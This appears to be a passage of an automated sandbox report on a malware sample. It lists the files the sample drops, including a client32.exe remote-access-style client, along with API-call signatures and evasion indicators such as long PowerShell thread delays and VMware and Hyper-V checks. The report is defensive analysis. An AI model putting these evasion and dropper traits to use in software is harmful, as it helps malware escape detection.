                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD86CD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_6CD86CD0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD00C80 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_6CD00C80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC62B70 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_6CC62B70
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC624D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_6CC624D0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD44410 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_6CD44410
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD52420 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_6CD52420
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCF6640 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_6CCF6640
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA176B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF76CA176B0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A31C06_2_6C9A31C0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCA44C06_2_6CCA44C0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary,6_2_6C9A5E30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6494Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3280Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-kernel32-legacy-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\pyexpat.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\select.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\python3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_elementtree.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\python311.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_queue.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_socket.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_lzma.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_bz2.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_ssl.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_decimal.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil\_psutil_windows.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18229
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeAPI coverage: 1.7 %
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI coverage: 7.3 %
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCA44C06_2_6CCA44C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A13F0 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C9A14DCh6_2_6C9A13F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA192F0 FindFirstFileExW,FindClose,0_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA192F0 FindFirstFileExW,FindClose,1_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7A0340 FindFirstFileExW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetLastError,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFDFB7A0340
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0F84
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDEFE1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6CBDCA9B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0B33
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0702
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6CBDC775
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA7C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBA7C6D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDFD86
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6CBDDF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF8B5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6CBDDA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6CBDD4FF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF40B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC06C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,6_2_6CC06C74
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: BUenB12U2a.exe, 00000000.00000003.1719990699.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                Source: client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: VMware
                                Source: client32.exe, 00000006.00000002.3574538256.000000000138D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2099393814.000000000138D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
